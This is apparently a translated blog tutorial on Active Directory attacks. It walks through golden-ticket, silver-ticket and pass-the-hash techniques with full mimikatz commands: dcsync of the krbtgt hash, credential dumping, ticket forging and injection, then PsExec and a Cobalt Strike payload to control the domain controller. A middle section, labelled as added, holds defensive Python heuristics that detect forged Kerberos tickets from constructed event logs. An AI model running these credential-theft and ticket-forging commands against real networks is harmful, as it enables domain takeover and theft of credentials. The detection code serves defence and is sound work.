Golden tickets and silver tickets

Golden Ticket

Prerequisite: the attacker has already obtained administrative rights on the domain controller.
klist: run on a domain member host to view the cached tickets.
klist purge: clear the cached tickets.
During domain penetration, if the domain administrator's password has been changed, try using the hash of the krbtgt account for a ticket attack instead: as a rule, nobody ever changes the krbtgt account's password.

Information collection

Domain name: net time /domain, ipconfig /all
Admin username to forge: net group "domain admins"
krbtgt account hash: mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit
Domain SID (the Administrator SID with the trailing -500 RID stripped): wmic useraccount get name,sid
# dump the krbtgt NTLM hash
mimikatz.exe "lsadump::dcsync /domain:NoOne.com /user:krbtgt" exit

Usage

# forge the golden ticket
mimikatz.exe "kerberos::golden /admin:Administrator /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /krbtgt:f965f8d06c2f73dd5d7015d0c2d10fa6 /ticket:Administrator.kirbi" exit

# pass the ticket: inject it to obtain domain administrator rights
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit

Silver Ticket

A forged TGS (service ticket); it only grants access to the specified service on the specified server.

Information collection

Domain name: net time /domain, ipconfig /all
Domain SID (the Administrator SID with the trailing -500 RID stripped): wmic useraccount get name,sid
Target machine FQDN: net time /domain shows it; it is hostname + domain name, e.g. /target:\\WIN-75NA0949GFB.NOONE.com
Service to abuse: CIFS (the file-sharing service) /service:CIFS
Username to forge: /user:Administrator
Service account NTLM hash (the hash listed under "Primary Username : WIN-75NA0949GFB$", i.e. the computer account ending in $, not the admin's hash): /rc4:08d93ddf15a6309a46daaa7ec8565296
# writes a mimikatz.log file (run on the domain controller)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

/user     target account/computer to impersonate (the username to forge)
/ptt      optional (injects the ticket; can also be done with Rubeus)
/service  service parameter, here cifs: /service:cifs
/domain   the domain name
/sid      the domain SID (whoami /user)
/target   the FQDN of the machine in the domain, e.g. /target:WIN-75NA0949GFB.NOONE.com
/rc4      NTLM hash of the service account (the user's or the computer's password hash)

Usage

# writes a mimikatz.log file (run on the domain controller)
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

# forge the silver ticket, granting access to the CIFS service
mimikatz.exe "kerberos::golden /domain:NOONE.com /sid:S-1-5-21-2867916317-3317112163-957300651 /target:WIN-75NA0949GFB.NOONE.com /service:CIFS /rc4:08d93ddf15a6309a46daaa7ec8565296 /user:Administrator /ptt" exit

dir \\WIN-75NA0949GFB.NOONE.com\c$
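The two ticket types above leave different gaps in the domain controller's own logs: a golden ticket is a forged TGT, so the DC issues service tickets (event 4769) for an account it never issued a TGT to (no event 4768); a silver ticket is a forged TGS, so the member host logs a Kerberos logon (event 4624) for which the DC never issued a service ticket. Both mimikatz commands on this page also use RC4 keys (/krbtgt:<NTLM>, /rc4), so the resulting tickets carry encryption type 0x17. The following is an added detection example, not part of the original post; the event records are constructed and field names are shortened from the Security log XML.

```python
# Heuristics for forged Kerberos tickets, run over constructed Windows Security
# event records. Assumptions: 4768/4769 come from the domain controller, 4624
# from the member host; field names are shortened from the event XML.
# SAMPLE_EVENTS is constructed data, not real log output.

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4; mimikatz /krbtgt:<NTLM> and /rc4 produce it

def forged_ticket_indicators(events):
    """Return (event, reason) pairs for events matching the forged-ticket heuristics."""
    tgt_issued = set()   # accounts the DC actually issued a TGT to (event 4768)
    tgs_issued = set()   # (account, service account) pairs the DC issued a TGS for (4769)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        acct = ev["account"].split("@")[0].lower()   # strip realm suffix, normalise case
        if ev["id"] == 4768 and ev.get("result", "0x0") == "0x0":
            tgt_issued.add(acct)
        elif ev["id"] == 4769:
            if ev["etype"] == RC4_HMAC:
                findings.append((ev, "RC4 service ticket (0x17) in an AES-capable domain"))
            if acct not in tgt_issued:
                # Golden ticket: the DC never logged a 4768 for this account, yet it
                # is issuing service tickets against the (forged) TGT.
                findings.append((ev, "TGS issued with no preceding TGT request (golden ticket?)"))
            tgs_issued.add((acct, ev["service"].lower()))
        elif ev["id"] == 4624 and ev.get("auth_pkg") == "Kerberos" and ev.get("logon_type") == 3:
            # Silver ticket: the member host accepted a service ticket the DC never
            # issued. Host SPNs such as cifs/<host> map to the computer account <host>$.
            svc_account = ev["host"].split(".")[0].lower() + "$"
            if (acct, svc_account) not in tgs_issued:
                findings.append((ev, "Kerberos logon with no DC-issued service ticket (silver ticket?)"))
    return findings

SAMPLE_EVENTS = [  # constructed sample: one legitimate session, one golden, one silver
    {"time": 1, "id": 4768, "account": "alice", "client_ip": "10.0.0.5", "result": "0x0"},
    {"time": 2, "id": 4769, "account": "alice@NOONE.COM", "service": "WIN-75NA0949GFB$",
     "etype": "0x12", "client_ip": "10.0.0.5"},
    {"time": 3, "id": 4624, "account": "alice", "host": "WIN-75NA0949GFB.NOONE.com",
     "auth_pkg": "Kerberos", "logon_type": 3},
    {"time": 4, "id": 4769, "account": "Administrator@NOONE.COM", "service": "WIN-75NA0949GFB$",
     "etype": "0x17", "client_ip": "10.0.0.9"},
    {"time": 5, "id": 4624, "account": "bob", "host": "WIN-75NA0949GFB.NOONE.com",
     "auth_pkg": "Kerberos", "logon_type": 3},
]

def run_sample():
    """Run the heuristics over the constructed events and return the reasons found."""
    return [reason for _, reason in forged_ticket_indicators(SAMPLE_EVENTS)]

if __name__ == "__main__":
    for reason in run_sample():
        print(reason)
```

These are heuristics, not proof: a legitimate TGT may have been issued before the log window, and RC4 tickets are still normal for accounts or services that have not been configured for AES, so correlate over a window that covers the TGT lifetime before alerting.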

Pass the hash

Once local administrator rights have been obtained: if the domain controller's password is the same as the web server's local administrator password, pass-the-hash can be used.

# elevate privileges and dump the hashes
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> log.txt
# pass the hash
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:NoOne.com /ntlm:c217b77d43348c0fa3c1f83f29747d5a"
# list the domain controller's C: drive
dir \\WIN-75NA0949GFB.NOONE.com\c$
Just looking at the DC's C: drive is rather dull, so let's do something more interesting.
On the controlled domain member host, upload PsExec.exe and change into its directory (https://github.com/vijayphilip/PsExecRemoteWinEC2).
psexec.exe \\WIN-75NA0949GFB.NOONE.com cmd.exe then returns a shell on the domain controller.
Then generate a PowerShell payload with CS to bring the domain controller online.

Note: ERROR kuhl_m_kerberos_ptt_data; LsaCallAuthenticationPackage KerbSubmitTicketMessage: c000000d
After a series of experiments of mine: if the domain member host is Windows XP or Windows Server 2003, a ticket cannot be forged normally.

Source: blog.csdn.net/weixin_45682070/article/details/106604280